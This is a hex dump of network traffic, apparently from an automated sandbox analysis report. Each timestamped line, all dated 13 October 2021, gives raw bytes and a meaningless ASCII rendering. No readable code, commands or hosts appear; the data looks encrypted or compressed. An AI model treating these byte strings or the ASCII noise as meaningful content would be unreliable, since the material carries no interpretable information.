                                                        2021-10-13 12:39:36 UTC82INData Raw: fe 6f 5c 0e dd de 20 5a 3a b0 9b 9c 81 c8 f6 80 e0 6b 33 0d 16 2d 5e 14 1e a6 81 82 fe 28 0e 5f 92 2e 7f fb 92 16 a5 35 4d 11 a7 73 ab 0e 51 a4 0c 67 a0 c6 55 10 ae 2c 2e fc 9f bd a1 9a a6 59 77 56 f1 66 2e d7 39 dc d9 34 89 2a 06 ad 6e 94 94 5c 90 c3 27 89 c4 5f 9f ff 8a af a3 ed 51 22 e0 ac 13 fe fe 3f 61 15 7c e2 ef 0a 97 2d a1 09 89 7e 32 d6 86 57 85 48 1f 2d 36 ef 71 44 82 8d 8d 7e cf fa 68 a2 a5 da dd dc e3 9f 05 7c 17 d1 22 db 39 35 a0 95 41 9b 1e 9c e4 84 a4 9b c0 c5 88 01 10 36 e9 e2 cc 93 0d 37 44 a1 c4 87 ae ac 24 d5 bb 23 87 17 52 35 f2 87 26 87 70 19 88 ff 64 5c 09 fc 24 c8 4c b7 ca 74 bd a0 8d eb c7 42 e9 cf a5 7b 4d a3 64 c5 90 d1 f1 0f 9b 42 79 9e da 12 07 a9 19 ed fd ba 58 ef 52 fb 39 97 33 00 49 d8 ce 6e f3 cb 37 26 df 1a 96 0c d9 68 1c
                                                        Data Ascii: o\ Z:k3-^(_.5MsQgU,.YwVf.94*n\'_Q"?a|-~2WH-6qD~h|"95A67D$#R5&pd\$LtB{MdByXR93In7&h
                                                        2021-10-13 12:39:36 UTC83INData Raw: 67 5b b2 3c 0c 41 57 3b 9d b0 41 71 76 c7 ec 9e 96 d4 33 63 18 80 c7 c7 9b 48 0b bc 92 47 54 bc 1a 3f 6e 3f c4 0c 68 7f a1 20 5e 12 62 88 e3 fd d6 ad 8f a6 36 8a e7 f8 9a a4 a9 d2 5f d1 14 14 95 60 89 93 46 a8 9a e7 89 d7 01 4e 51 5f a9 bb 8f d6 14 b5 8f bb d3 7e 0b c7 18 e1 eb b7 33 32 fc 32 54 03 2a a9 71 ed b6 02 38 97 42 7c 5a 1d bd 4b 31 8f a7 02 f1 39 bb 4d cf 73 f8 44 34 38 1f 94 8c 8c d0 10 d2 2e df b6 dd 1d fa 4b 9b 8a 36 b6 5c d6 76 9c 80 ec 29 64 71 7c 0b 30 92 4c 59 34 48 79 7d fc 95 f8 20 09 68 82 97 53 fe d6 7d b1 57 7a bb f7 cb a6 a7 c9 d8 24 41 d4 69 a6 97 87 63 58 b5 54 87 6f a4 58 e5 5b 44 2f 3c bf cf 21 13 60 7c 02 6a 0d eb 65 ff ae c6 59 c0 86 4c 98 94 9e fa d3 89 32 45 53 f0 d5 2d 87 b8 27 69 23 e3 80 59 38 25 c9 66 6b 04 5c 92 9c 90
                                                        Data Ascii: g[<AW;Aqv3cHGT?n?h ^b6_`FNQ_~322T*q8B|ZK19MsD48.K6\v)dq|0LY4Hy} hS}Wz$AicXToX[D/<!`|jeYL2ES-'i#Y8%fk\
                                                        2021-10-13 12:39:36 UTC84INData Raw: 69 fc 21 a5 a8 4e f2 a6 c0 94 48 da 90 ac 1d d0 13 25 43 6d 7b 16 40 c6 bf 5b 3d bb 6e 45 28 8e e1 f8 3a a4 f5 ff a3 d8 64 11 d7 e8 5b 75 4c 8f b4 7b 3e a4 de 7e 7f 12 7a 59 46 18 0f fb 83 16 28 7c 3c b0 05 04 8a f1 0c d8 e8 76 8e 4b a9 56 1c 89 7e b1 57 31 48 76 81 08 b8 f4 7a c3 5c 24 1e 8b 74 3d 73 13 f7 63 52 fb c4 6b a1 b5 b0 04 25 8c a2 46 e2 92 24 d5 c6 aa 29 88 db 02 5e 5d dc de 5a 73 77 67 43 f4 ff e4 3e f5 7a 0e 77 78 2f 2c 98 bd 37 9f d8 de 86 29 48 9e fc c5 91 fa 4a ab 42 0d 76 ec a6 15 61 0c 76 71 e4 72 27 d0 5e 68 c3 58 04 ce 92 26 16 39 87 a3 63 25 30 8d a6 d8 26 f0 8e f2 0d 64 51 4d 71 ed d5 89 b3 ba 23 a8 79 3a 7f c9 ec 6a e2 30 07 c7 d0 0d 1a 80 fe db 53 55 1b b5 65 2c 14 3e 21 f7 e0 7d 28 26 0a 1e 73 53 88 2d 62 91 c4 df f3 18 42 69 7b
                                                        Data Ascii: i!NH%Cm{@[=nE(:d[uL{>~zYF(|<vKV~W1Hvz\$t=scRk%F$)^]ZswgC>zwx/,7)HJBvavqr'^hX&9c%0&dQMq#y:j0SUe,>!}(&sS-bBi{
                                                        2021-10-13 12:39:36 UTC86INData Raw: 99 1b 71 5e d6 76 1f 91 c5 40 e7 ea bf d0 7b 9e 5b 73 54 eb 78 eb 5c 12 cd dd 2e 5f 6c 28 bd 66 80 80 ad 92 c3 29 a7 8f 1c 9d f5 8a a7 b5 9a 15 31 e4 b0 c5 ba d0 3c 7c 0f 6e 74 8d 4a 8e d3 aa 0d ce 57 30 f7 04 49 39 3b 40 1f 35 e5 b2 03 80 8d 28 77 d7 7d 19 98 3f da d7 fe b0 b5 2b 76 1e c2 a2 86 5d 34 de 07 69 de 16 8a c6 82 e2 99 ca d9 b2 19 ad 8e 82 86 55 93 07 40 84 89 ea 83 b1 98 21 e9 b0 1a a6 0a 6c cd f9 76 83 94 74 0e 5d ff 67 30 f6 ef 2b c2 56 a9 d2 25 52 b7 b2 c8 d4 50 f5 43 a7 7b 4d a9 1c 9d ca c2 e0 14 a3 68 9f 9f d0 30 52 a0 1e f5 ee fd e5 ec 52 f7 25 06 31 00 49 b7 9c 7b 25 d2 0f 7f cd 0b 8e 2d 0e 04 9f aa 39 c0 47 2a 34 8e 09 c8 17 b7 12 d0 93 da 85 de e8 22 d5 0d 84 bd 0b 8f 3e c0 4a 22 e9 45 6b 59 13 68 d0 29 8c 4a 4a 7e ec df dd 5a fd 21
                                                        Data Ascii: q^v@{[sTx\._l(f)1<|ntJW0I9;@5(w}?+v]4iU@!lvt]g0+V%RPC{Mh0RR%1I{%-9G*4">J"EkYh)JJ~Z!
                                                        2021-10-13 12:39:36 UTC87INData Raw: 6f 4b c2 95 a7 25 b0 99 2b 15 a4 ad cd c2 c2 1b 05 92 62 ae ac b8 a9 b6 d3 82 c3 8c 0e 7f 5d bb a9 83 b5 7e 0f 8c 97 dd 40 64 df 15 eb f3 a0 d5 eb a3 62 54 78 e6 81 34 eb b1 99 30 51 40 7c 50 5a f2 4f 30 8f a1 ab ae 34 8e 17 d1 7c f1 4d c5 23 cd 98 a3 8b bd da c9 3d d4 38 7b 23 e5 ac 97 a6 3c bb b1 d8 5a 94 8c f0 7a 4c 7c 5b 22 32 90 76 b9 01 b7 86 53 72 22 f4 ca 3f df e5 ba 48 f3 60 74 a7 b8 79 ec 33 dc ab a3 c3 40 4b 5f f5 2b c9 93 ac e7 5d a1 f1 cd 6a ac 63 2f 32 29 bd 14 bf d6 39 50 62 cf 09 42 4b 5a 65 f5 a7 bf ce c8 be af eb d5 9c fa c8 fe 67 b9 52 d6 fe 7d 96 b1 2d f4 c8 fe 7e 59 18 35 d2 0e 3a d1 4f 9b 98 ad 8b ee 99 2c bd 13 aa 98 9a 53 77 3c 22 4a 82 fe 73 1b d1 89 3d 7a f9 f8 d9 b2 cb 48 b3 13 e7 87 0a 51 b4 00 56 69 c6 79 0a 84 61 41 cb 97 aa
                                                        Data Ascii: oK%+b]~@dbTx40Q@|PZO04|M#=8{#<ZzL|["2vSr"?H`ty3@K_+]jc/2)9PbBKZegR}-~Y5:O,Sw<"Js=zHQViyaA
                                                        2021-10-13 12:39:36 UTC88INData Raw: 92 ea a3 31 a4 cb 78 71 3c 52 d7 40 39 0d 82 30 c6 28 78 4b e0 0a 2c 99 e8 66 a1 ae 0f 48 41 81 11 19 fa 35 a5 17 9a 5d 7e f2 53 93 e7 7f eb 08 29 06 7f 64 15 13 58 8e a5 58 d3 85 6a 25 2e 87 4f 67 97 ac 57 e7 9a 3a 55 ef bb 26 95 b0 31 5f 71 cd 6b 33 ed 67 6f 61 0c c7 ce 35 9a f8 0d 0c b6 3c 2b 83 df 65 92 d8 c5 90 5c 7c 24 ff e9 ac d0 0b b8 48 1d 0f 28 aa 14 67 7f 35 08 2f 78 59 96 55 79 cf a6 c3 e6 92 2c 16 39 90 a3 63 25 52 c9 8c 9f 2e d8 ce f2 76 a8 79 06 77 ea ac a7 34 bb 29 bf 6e 01 28 c4 ec 71 c5 6a 41 39 db 30 17 cb df de 53 5f 2c b5 74 23 1e 07 68 ea a9 89 38 0f 20 11 fe 79 99 27 0e 3d 8d c5 9c 98 f4 06 67 c6 eb 82 ca ed b0 61 0f 8b c5 bb 48 b6 0a 94 99 7d 50 41 76 17 15 93 c6 77 bc 55 83 26 4c 62 e6 c3 e2 f9 f6 af f4 60 25 ba e0 ff 66 e5 ab d2
                                                        Data Ascii: 1xq<R@90(xK,fHA5]~S)dXXj%.OgW:U&1_qk3goa5<+e\|$H(g5/xYUy,9c%R.vyw4)n(qjA90S_,t#h8 y'=gaH}PAvwU&Lb`%f
                                                        2021-10-13 12:39:36 UTC89INData Raw: 6e 33 e4 bb fb d7 62 3c 76 0c 54 80 f8 1f 88 d5 b1 21 11 41 18 42 0e 5e a9 50 89 1a 35 ef 9b 55 88 9c 28 68 d9 67 55 dc 3d db 7f c7 ff a0 3a 79 3f ca 34 f5 13 94 cf 07 52 92 05 83 d8 be bc 16 e5 d3 bb 02 28 32 fc 97 42 85 91 2c 59 9e fd 1b bf ad 1a 4e b0 0b a3 04 59 24 68 76 82 94 79 0e 11 c4 72 2f c9 f6 37 c7 6f b7 cd 67 a6 14 98 ea d2 c9 92 2a 68 7f 47 b6 61 63 89 c0 e0 1f 98 27 8c 95 cc 30 da a6 1e f9 54 83 6b f9 46 e5 7e ef 33 00 49 df 52 46 25 d8 26 21 e7 ff 85 3e 0f 37 de 92 73 c2 54 5e e7 ad f7 cd 4f 3e 03 d9 85 1d 92 c0 21 8b d3 02 84 ad 2c dd 2d 3e 41 7a f1 47 6d ce 24 a4 d0 28 99 40 37 3e a6 df d9 4a d1 96 ac 16 55 30 7a 42 41 78 8c c5 c3 a8 8d 31 b3 6c 4e 39 97 d0 aa e0 a5 0b d1 ad b2 a4 0b e9 b6 54 fa 67 90 91 6a 4a 71 cf 71 64 2d ee 82 68 42
                                                        Data Ascii: n3b<vT!AB^P5U(hgU=:y?4R(2B,YNY$hvyr/7og*hGac'0TkF~3IRF%&!>7sT^O>!,->AzGm$(@7>JU0zBAx1lN9TgjJqqd-hB
                                                        2021-10-13 12:39:36 UTC91INData Raw: 6f 32 d0 21 28 44 ec a9 7b e1 de 20 19 17 48 6f 5e 53 99 a4 85 8e a7 26 33 89 87 6a ad 72 f1 5c db 3d 5c 2d 8e 8e a1 c5 c0 38 c8 29 52 7f f2 52 96 9b 2d bd b3 4d 49 89 92 eb 26 be 12 c4 21 19 9f 5d 28 e6 5b 72 7e 7a 33 e3 d2 1c df 94 b7 5e d3 cf 74 a5 a9 69 9c dd 48 aa a7 c6 d7 d3 60 f9 6a 8d 95 21 cc 5f a2 83 9f 65 8c 68 37 58 5a 74 3d bf dc 10 06 67 de 08 42 cc 5a 65 f9 a9 c6 59 da ac ba 89 99 be fa c3 80 25 a8 46 ce c2 1d 02 b0 27 7e 39 f7 6f 53 3c f2 db 0c 47 0c 59 88 88 93 da fd e5 c7 bd 12 ae 16 3e 4d 67 2d 71 17 83 fe 71 7c 5b fa 1f 79 fb 85 01 ba da 44 2c a8 04 90 08 51 b3 1e 6d 5b d1 68 0d 22 8c 56 11 8e a8 b8 bc b5 4f 66 51 eb 72 ac c5 17 df cc 29 60 fd 39 b8 7d 8c ec bd 81 cd 3c af ed 48 ae 13 91 bb c4 6a 51 33 e5 ab e8 e8 08 2b a0 8b 53 e2 fe
                                                        Data Ascii: o2!(D{ Ho^S&3jr\=\-8)RR-MI&!]([r~z3^tiH`j!_eh7XZt=gBZeY%F'~9oS<GY>Mg-qq|[yD,Qm[h"VOfQr)`9}<HjQ3+S
                                                        2021-10-13 12:39:36 UTC92INData Raw: 5c 2d 10 8b 76 1b 66 3d 9b 8d 81 ff c0 6e 34 22 23 74 65 97 a7 6e fd 8a 37 d0 b5 e2 24 97 c1 86 56 5b c9 dc 4f c7 60 6f 1a ae ff e4 8b 9a f8 1e 61 73 3f 2f 93 ba 36 93 ce e7 e0 36 0f 66 ee ed b7 fc 5e 44 4b 1d 1f 44 b0 3d b4 7b 37 75 f5 7c d5 ef 5c 68 c8 58 53 cd 92 26 67 1b 42 a3 69 5b 4a d3 7e cf fa 55 ef f0 0d 6f 6a 03 70 e9 ce e3 27 be ad 19 74 71 7a ee 85 7b ed 29 50 3d c0 25 05 46 95 d7 54 79 13 d8 a5 27 14 29 3f ec 25 fe 29 0a 30 34 6e 51 99 2d 7f 1f 42 c5 96 e6 52 6c 57 c7 eb 88 7b e5 1a 61 b1 8a c7 c0 43 b6 0a 81 86 7f 5c af 56 3c 15 93 c4 1d 66 4c 7d 23 71 69 cd 9b e4 e3 ef a7 8f b7 2f a4 1a f9 39 ad 91 18 ed d1 14 1a 8a 7e bb e9 57 a2 85 ea 7e c1 d3 49 6b 51 ae b8 9c d5 0d 5a 84 8a 29 69 0d d7 04 e5 d8 4d cd 33 d0 35 45 72 ec b8 7b f2 4f 92 34
                                                        Data Ascii: \-vf=n4"#ten7$V[O`oas?/66f^DKD={7u|\hXS&gBi[J~Uojp'tqz{)P=%FTy')?%)04nQ-BRlW{aC\V<fL}#qi/9~W~IkQZ)iM35Er{O4
                                                        2021-10-13 12:39:36 UTC93INData Raw: 7a 78 70 35 f5 1f 1c de 0c 5d 9b 14 8a cc a1 a4 94 d0 d3 b7 19 3b 39 ec 9c 54 b5 0d 21 10 89 f8 9d ae a6 33 fd 80 02 a9 97 50 33 f8 9c 89 85 61 0d 98 ea 74 3c ce e8 2f d4 54 a2 d9 6b ba bc 8a e8 d3 47 8b 01 b7 7a 55 b4 64 ec 9c c0 f2 1b 99 2e b5 33 db 18 12 9b 19 fd f6 92 49 5d 53 f1 50 54 35 11 45 cb a5 a0 25 d8 23 35 b4 d7 84 3e 01 0d 46 c2 e9 c0 56 21 44 33 f6 c9 3d bf 78 05 84 0c 92 c1 6d 7d 26 02 84 a8 6b fb 2d 3e 41 d0 98 62 45 e2 59 68 da 3b 95 41 5d fa 8e b0 dd 5b d3 b8 68 16 cf 1e f3 ed 40 72 28 f2 d1 ac 5c 0a 8f 7d 4a 22 41 cd c2 36 6d f4 d3 a5 da 64 08 c9 b3 53 75 cc b8 44 6c 31 a2 e7 de 61 3a 82 7e 7c 2a 0a a8 73 16 28 72 91 f1 16 03 b9 6f 67 ab ac 62 8c 3a 5d 15 1e 8d fa 10 00 4a 5b ac 92 18 82 ec 4d 0c 4d 2b 06 77 0e cd 60 11 88 b4 59 61 d3
                                                        Data Ascii: zxp5];9T!3P3at</TkGzUd.3I]SPT5E%#5>FV!D3=xm}&k->AbEYh;A][h@r(\}J"A6mdSuDl1a:~|*s(rogb:]J[MM+w`Ya
                                                        2021-10-13 12:39:36 UTC95INData Raw: 46 be 50 3b ac a4 c1 d7 82 83 ef 36 a6 69 63 08 b1 95 4e 28 da 59 79 79 78 4d 9f f8 38 d5 b2 ac 43 ec f6 1b 5b a8 7b 9d d3 cd a0 b6 c4 dc 40 2f 97 69 8d 9f 8a f0 59 cd b8 8e 68 a6 7e ec 4b 43 ea 18 87 7d 11 15 60 c9 12 64 62 6f 67 ff b5 cf 70 a6 50 a8 98 9e 8d f6 d3 8c 30 80 d0 dc d6 35 92 a0 29 17 1d fc 7e 52 02 32 d3 63 b2 1a 4f 91 f3 ec cc ec e8 f4 b0 02 a3 3e 93 5c 75 38 42 ee ec fc 77 65 7e bf 3b 6a f5 ec 25 b0 cb 46 2c a8 7c 6e 65 5d b4 08 74 31 aa 7b 00 a6 37 50 c0 b5 92 a8 b2 98 34 18 5e fa 76 1b c2 32 cb cc 22 18 1c 28 bd 66 ed 94 69 92 c9 0b 8a da 4c 92 dd f1 b6 b0 ef 7c 2e f5 b1 c5 d0 d1 3c 70 69 17 e0 fe 04 aa c2 ab 23 9a 5b 5f ca 0f 5e a5 27 6b 1f 35 e5 bc 57 8c 9a f4 6d c1 fa 64 cd 24 e4 8b 29 0a 48 23 51 27 ca 3f dd c2 32 de 0b 2e f4 16 8a
                                                        Data Ascii: FP;6icN(YyyxM8C[{@/iYh~KC}`dbogpP05)~R2cO>\u8Bwe~;j%F,|ne]t1{7P4^v2"(fiL|.<pi#[_^'k5Wmd$)H#Q'?2.
                                                        2021-10-13 12:39:36 UTC96INData Raw: 19 7c 55 27 2b 80 bb da 91 f4 cd 91 3d 0f 67 eb 17 a7 d4 4a ad 43 17 1e 70 59 14 4b 7d 1c 71 cf 9b 41 85 40 1b bc 72 4c c6 b8 5e 16 39 9e a3 63 25 6f c5 8e da 3b a5 1a f0 0d 6a 7b 7d a8 ed df e2 59 44 23 ae 6c 58 6c d5 dc 79 ed 69 43 39 d1 21 13 b8 96 de 7b 42 04 f0 7c 21 02 52 cf e8 a9 87 2a 22 a3 1d 71 5a b5 2c 24 68 42 c5 9a ef 6a 6b 7d cd 91 8c 7e e7 17 65 2f 74 38 c0 83 87 01 b8 be 6e 56 91 8a 67 14 93 ce 76 6e 56 fe fd 5d 6f ca 8a e7 84 1c ad 8f a2 0f ba e4 eb 25 a7 a9 97 ed d1 14 05 83 6d b1 eb 45 ac b2 55 81 c0 f9 4a 55 cf b0 b6 85 f3 06 63 a0 95 d7 6e 52 f4 17 e1 e8 d6 c3 37 f8 b9 57 78 e6 85 7a c1 9f 91 18 11 31 55 58 42 97 b1 33 98 da cd bd 3e 95 53 c7 7d f5 74 b2 39 33 9f f2 6c ab d6 d6 04 db 38 6a 3f c3 56 96 40 3f ac a2 d7 5a 85 83 ed 1f a5
                                                        Data Ascii: |U'+=gJCpYK}qA@rL^9c%o;j{}YD#lXlyiC9!{B|!R*"qZ,$hBjk}~e/t8nVgvnV]o%mEUJUcnR7Wxz1UXB3>S}t93l8j?V@?Z
                                                        2021-10-13 12:39:36 UTC97INData Raw: cf 33 8b ec 70 1f cb fc fe c2 47 a6 01 67 ac a7 88 e8 d3 6b 4a 02 a5 7b 47 a1 73 f3 70 c1 cc 17 83 42 e3 9d da 12 0a b1 1b ff e7 97 76 13 53 dd 55 5f 20 05 43 d8 db 62 db d9 0b 3d c8 0d f9 d5 05 1b d8 a5 25 c5 56 34 2e b7 09 c8 17 b7 05 de f9 e7 96 d7 f3 1d d5 07 84 bd 01 88 d1 3f 67 05 d2 44 1e 61 58 68 d6 22 84 51 49 f2 b7 da c2 52 2b 91 91 18 c6 77 a5 40 41 78 31 de d4 ba 5b 33 b2 61 b4 29 b3 f8 e1 3b a4 f3 65 ae c9 6b 78 96 b0 53 7f 3f 10 93 68 3b a8 d2 62 65 3a 95 5d 73 c7 0c ac 40 15 2a 0b fb f0 07 02 8b f3 75 ae ac 65 8b 5f 7f 14 32 9e 73 82 e9 97 fa 77 81 11 e2 98 77 c3 47 58 86 77 75 1b 6d 0e 85 b6 57 fb d1 6d 33 da ae 25 66 80 b5 43 e2 9a 32 c5 cc 45 27 bb c9 d7 5a 49 e6 23 a3 08 4c 71 69 b5 cf e6 34 a1 f8 0f 77 b3 3c 2b 96 b8 2f 84 d2 cc 8f 42
                                                        Data Ascii: 3pGgkJ{GspBvSU_ Cb=%V4.?gDaXh"QIR+w@Ax1[3a);ekxS?h;be:]s@*ue_2swwGXwumWm3%fC2E'ZI#Lqi4w<+/B
                                                        2021-10-13 12:39:36 UTC98INData Raw: 83 0d f9 95 aa a4 91 c1 ca b6 03 32 25 13 9d 78 97 26 e6 4f 84 ea 8e b8 58 33 ca b2 1c a4 15 5b 2c f1 a4 88 a9 72 32 8e d4 09 d0 36 03 2c e8 47 b5 fd 65 ac 1a 9e fb d6 83 86 02 b4 6d 4b 88 e8 ee 8e c0 e0 16 93 d3 9c b3 d2 6b af a3 1e f9 fd 8b 6d ed 5a ef a8 46 1f 0a 44 d1 a3 6b 24 d8 23 28 c6 07 84 36 1e e5 dd 95 32 eb 06 39 27 ad ff d5 c5 bc 2f d0 83 0f eb d8 f6 06 c2 1f 88 ac 0c 8a d1 3f 67 03 d7 39 f5 d5 59 62 ad 27 9c 42 48 e9 aa df d5 44 dc 6e bc 3e c5 1f df 3f 52 73 2e d0 d8 b5 57 22 bf 64 b4 29 b3 e4 e4 36 c8 f5 d3 a5 e5 af 11 e5 b2 5b 68 b2 91 bd 61 36 a6 b2 7f 61 3a 80 46 66 39 05 97 b5 17 04 7a 57 fd 07 0c 96 17 67 87 ae 63 82 41 89 0a 14 77 75 8b 15 bb 49 4e dc e8 6e 18 72 e9 5e 1b 05 75 d4 11 60 11 5d a5 52 ea d6 7b 21 1c 3d 09 65 97 a6 57 e6
                                                        Data Ascii: 2%x&OX3[,r26,GemKkmZFDk$#(629'/?g9Yb'BHDn>?Rs.W"d)6[ha6a:Ff9zWgcAwuINnr^u`]R{!=eW
                                                        2021-10-13 12:39:36 UTC99INData Raw: eb 35 c9 6d 76 20 1d 83 4c 59 e2 49 79 7d fc 95 80 54 38 df 9e a0 5b f6 d6 65 a2 b6 76 69 f4 f0 a2 af d1 c0 eb 63 e7 65 9e 90 ac f6 5a b9 7c 8d 44 a2 6b 4d 48 5b f9 12 86 b5 ee ea 9f d3 10 6f 0d 49 60 e0 b6 2e 4b e5 ae ab e3 9a 9f fa c6 ef ac b9 52 d6 db 2a 9e a2 22 78 3b fb 66 a6 15 0f d3 0e 3a 08 4e 9b 98 96 e0 c8 fb f4 b8 13 bf 13 34 a0 74 12 49 83 f9 f0 76 6f 56 e6 b4 79 fb 89 aa b8 d1 5f 38 a4 7a bd 15 43 4b 09 52 51 c5 02 0e ad 3b 45 f2 3e bd ab b2 81 48 64 59 fa 6d 38 cc 29 33 dc 00 71 00 cc a2 7d 91 fe 6b 83 c6 32 b5 02 5c b3 fa 82 cd be e8 51 37 8b 41 ed ff d8 23 63 15 7d e2 ef 0b 93 df 5e 24 a7 5d 38 ea db 52 b0 45 17 18 35 fe 9f 59 89 73 23 52 da ec 68 a7 33 db dd d2 9a 3e 29 7c 1d d2 ee 4d ce 3d c1 01 52 9e 14 9b c9 bd 5a 9a e6 d0 a3 10 3e 39
                                                        Data Ascii: 5mv LYIy}T8[eviceZ|DkMH[oI`.KR*"x;f:N4tIvoVy_8zCKRQ;E>HdYm8)3q}k2\Q7A#c}^$]8RE5Ys#Rh3>)|M=RZ>9
                                                        2021-10-13 12:39:36 UTC100INData Raw: cb 9f 59 9c 62 fd e3 80 fb 33 a1 49 17 1d 63 8c 33 6e 79 21 74 e2 f6 ee f8 74 fd cb 70 46 7b fd 77 14 42 4a b0 66 25 45 d2 b5 dd 43 76 c4 f0 07 69 68 03 cb 83 05 ed 31 ad 49 9e b3 76 03 3d ec 7b e7 2c 38 20 d0 21 17 a6 a5 da 5a 3a ab f0 76 29 03 05 2e f3 99 80 29 25 31 1c 71 8b 99 27 1d 35 d1 c5 9c 96 4f 6b 7e cf 84 43 69 d5 19 4d 03 8f cf af f9 b6 0a 9a c1 7b 5d 49 e8 39 01 c2 d2 07 b2 5f 8b 0e 5b 67 a1 df e3 f9 f6 71 88 8c 25 bb f4 f8 15 a6 a9 d4 ed cc 37 05 89 6d b1 e9 46 b3 aa e2 80 c7 fe 4f 7d 81 b1 b6 9e dd 5d 30 80 96 d7 6c 54 e1 15 e1 e3 81 c6 1b fe 29 56 7e 9f 2f 73 e9 bb e9 1a 47 2d b5 5b 42 9b c1 19 19 a5 2c b7 33 b9 c7 c0 73 fb 50 c3 47 ab 99 8f 84 83 16 d3 2e dd 2b 6e 2a 9c c5 94 8a 35 bf a4 fc 67 97 85 c7 af b0 7d 7d 33 1c 96 5f 27 9d d1 7b
                                                        Data Ascii: Yb3Ic3ny!ttpF{wBJf%ECvih1Iv={,8 !Z:v).)%1q'5Ok~CiM{]I9_[gq%7mFO}]0lT)V~/sG-[B,3sPG.+n*5g}}3_'{
                                                        2021-10-13 12:39:36 UTC102INData Raw: 54 a0 cd 76 aa a0 60 fa fa 50 91 11 a3 7b 56 b6 69 f9 70 c1 cc 1c a0 28 a5 10 27 e7 eb 88 1e ff e5 a2 65 ed e0 f2 56 47 ec 00 43 d8 c8 6a 23 e0 83 34 cf 0b 84 2f 03 01 22 b8 1a c8 6e 59 2a ad f7 d2 28 bb 03 c8 82 13 8e 29 f6 2a d1 00 ff a2 05 90 2b 28 63 92 d2 47 67 c3 41 07 7e 28 9d 48 53 eb b5 d9 dd 4a d3 8f a6 ec ce 34 f9 40 3a 7c 2f d4 c3 bd 58 59 aa 7c 4a 2c f0 3c e6 1e 5c dc 4e ad c9 67 1d f3 dd fd 75 4c 9a 8e 74 22 a2 cf 60 66 25 8d a6 6b 15 45 82 30 18 29 78 4b ef 8a 2f 80 e9 67 b8 a9 65 8b 57 9e 45 82 98 71 b0 08 db d0 67 84 0f 86 7b 64 c6 54 33 9a 64 70 0b 7f 06 10 b4 57 e0 df 63 b9 35 aa 15 7a 83 3a 57 e7 96 21 46 d7 be 30 89 a4 52 5f 71 c3 c3 56 e4 60 6f 7a a8 e0 f3 ca 9b d4 18 75 05 32 2a 87 a8 32 b8 44 cd 89 3c 19 78 92 47 a6 f8 42 a5 50 04
                                                        Data Ascii: Tv`P{Vip('eVGCj#4/"nY*()*+(cGgA~(HSJ4@:|/XY|J,<\NguLt"`f%kE0)xK/geWEqg{dT3dpWc5z:W!F0R_qV`ozu2*2D<xGBP
                                                        2021-10-13 12:39:36 UTC103INData Raw: 96 6a d7 67 37 58 5e fe 98 08 6a 39 89 62 cf 09 7c 15 37 cb ff bf da 55 d3 ad ad 98 85 9a e2 3c 81 09 b4 50 a7 d8 34 94 b5 48 d8 28 fe 74 52 0d 30 db 0c 50 1e 51 65 9d ad d9 ee 99 e9 bc 13 aa 00 05 c3 77 3e 53 97 98 91 d9 6f 52 83 22 72 e8 87 12 a3 cf 53 25 5a 6a 94 74 53 ce 06 7f 5e c3 66 0c 21 10 41 cb 9c b0 a2 a4 be a4 77 5c fa e0 34 c4 19 32 dd 2c 77 b7 23 a5 4c 7d fb 6b 92 5f 24 b8 dc a2 9f f5 80 2a b9 f3 71 cc e4 ba ed 63 db 27 56 f9 78 e2 fe 92 85 cf 80 da 8b 55 30 61 04 43 8f b7 04 1d 35 73 93 58 a2 72 22 7e cf 77 63 c3 34 fa 22 d6 f5 b7 b7 75 08 d1 14 0a 19 36 de 91 48 84 1f aa 33 aa a4 9b 56 da ad 1c 37 56 43 9c 54 99 12 24 41 8d ea 96 aa b9 3f 18 b1 27 be 17 29 3d f9 5a 8d 81 58 86 89 ec 69 39 d7 93 8a c2 47 ac d2 69 bf b2 9e ea d2 4c 89 fc a4
                                                        Data Ascii: jg7X^j9b|7U<P4H(tR0PQew>SoR"rS%ZjtS^f!Aw\42,w#L}k_$*qc'VxU0aC5sXr"~wc4"u6H3V7VCT$A?')=ZXi9GiL
                                                        2021-10-13 12:39:36 UTC104INData Raw: 06 6a 16 8f 71 ed d5 f5 32 a7 30 a6 66 63 64 d9 cc 85 ec 03 53 3b aa 2f 12 b8 92 d5 3c cb 06 f0 7c 3c 35 3c 26 e8 b8 8b 36 19 cf 1d 5d 5d 88 21 1d 41 03 65 62 63 bc 76 69 d4 e3 88 79 dd 00 6e f1 8a eb cd 95 b1 1d 4a 28 7f 51 84 ff 22 05 80 cc 0c 7d 5d 9c 2e a3 6e e2 83 f2 fc fb 15 58 b5 20 a5 e9 eb 1d a4 b8 da f2 cc ea 04 af 62 b5 86 c3 aa 9a ed b9 7f ff 4f 7d 42 af a5 87 df 1c 43 91 83 29 69 0d d0 12 e7 6c 1b f6 d3 2d d4 a9 67 f9 ba 79 e9 a0 9b 07 1e bc 7d 76 50 9f b0 3f 8e a7 28 aa 29 e2 c5 c0 73 fb 50 d5 33 20 91 8f 9f a3 c9 c5 d0 da 14 60 24 9c fd 96 8a 35 b3 ba c4 52 85 92 e7 28 a7 83 76 0c 13 9d 21 d9 f2 48 73 66 64 31 e7 fa 29 d7 8b a3 b6 f2 fa 60 a4 f9 00 8b f4 dc af a4 90 bf c1 41 f8 6f bc de b3 f8 4c aa 82 9d 60 b3 76 c8 59 76 f5 15 ef ca 6c 0c
                                                        Data Ascii: jq20fcdS;/<|<5<&6]]!AebcviynJ(Q"}].nX bO}BC)il-gy}vP?()sP3 `$5R(v!Hsfd1)`AoL`vYvl
                                                        2021-10-13 12:39:36 UTC105INData Raw: cd 49 77 d7 0a 84 3e 1a 16 cf b1 36 d1 5e 3a 33 53 f6 e5 22 b8 00 d1 9b 18 40 ff c8 07 c6 08 ac 07 06 90 25 43 68 0f d0 43 72 cc 4a 60 d0 39 95 5d 43 0c a7 f3 c9 5e d6 98 a2 06 19 30 e4 43 41 78 53 c8 c6 bf 5f 3d a7 6e 42 28 8e e6 f8 0f a4 f5 ff bb cc 6e 03 f6 ae 85 5d 73 91 91 62 4c b9 ce 71 64 25 96 4b 62 39 1c 88 56 e8 29 54 45 f6 10 44 6c e9 66 ab b2 67 86 41 90 1d 01 84 8a a6 3b 84 49 75 89 08 9d 31 5d fc 4c 2b 0c 08 6e 10 60 15 93 ab 41 f3 c0 79 2d 3f 51 08 49 9c a5 4e ca 05 35 da cc b0 3a 84 c3 fc 4e 79 d6 d6 a2 f6 4a 63 7a aa e8 a4 9c 9a f8 0f 68 75 2f 23 87 bd 2c 8f c2 31 88 1a 07 68 ea 3f aa e7 53 a9 40 17 08 60 b8 03 99 7e 1b 79 f5 7d 46 8a 6f 81 d6 67 5f c4 92 3d 1c 5d 55 5d 62 0d 4a d5 a2 cf 1f 0f db e6 1e 66 79 17 7b f2 c6 18 37 97 3a ab 65
